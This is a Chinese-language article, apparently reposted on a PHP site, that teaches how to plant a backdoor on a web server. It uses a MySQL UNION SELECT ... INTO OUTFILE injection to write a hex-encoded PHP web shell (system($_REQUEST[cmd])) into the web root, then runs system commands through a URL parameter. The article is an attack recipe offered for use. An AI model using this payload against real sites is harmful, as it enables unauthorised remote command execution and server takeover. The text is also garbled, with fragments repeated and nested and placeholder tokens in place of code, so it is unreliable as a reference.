Home  >  Article  >  Database  >  运用Mysql语句生成后门木马的具体方法_MySQL

运用Mysql语句生成后门木马的具体方法_MySQL

WBOY
WBOYOriginal
2016-06-01 14:04:321098browse

MySQL语句

 

通过Mysql 的语句生成后门木马的方法:

 

<ccid_code></ccid_code>SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

 

 

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

 

<ccid_code></ccid_code>2 3 <?php system(<span class="a14c" id="zoom"> 
<p style="TEXT-INDENT: 2em">通过Mysql 的语句生成后门木马的方法: </p>
<p style="TEXT-INDENT: 2em"> </p>
<ccid_nobr></ccid_nobr>
<ccid_code></ccid_code>SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

 

 

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

 

___FCKpd___1

 

 

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

 

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

 

答:就是下图代码中的十六进制编码,

 

<ccid_code></ccid_code><?php system(<span class="a14c" id="zoom"> 
<p style="TEXT-INDENT: 2em">通过Mysql 的语句生成后门木马的方法: </p>
<p style="TEXT-INDENT: 2em"> </p>
<ccid_nobr></ccid_nobr>
<ccid_code></ccid_code>SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

 

 

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

 

<ccid_code></ccid_code>2 3 <?php system(<span class="a14c" id="zoom"> 
<p style="TEXT-INDENT: 2em">通过Mysql 的语句生成后门木马的方法: </p>
<p style="TEXT-INDENT: 2em"> </p>
<ccid_nobr></ccid_nobr>
<ccid_code></ccid_code>SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

 

 

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

 

___FCKpd___1

 

 

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

 

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

 

答:就是下图代码中的十六进制编码,

 

___FCKpd___2

 

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

REQUEST[cmd]);?>

 

 

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

 

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

 

答:就是下图代码中的十六进制编码,

 

___FCKpd___2

 

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

REQUEST[cmd]);?>

 

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

REQUEST[cmd]);?>

 

 

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

 

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

 

答:就是下图代码中的十六进制编码,

 

___FCKpd___2

 

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn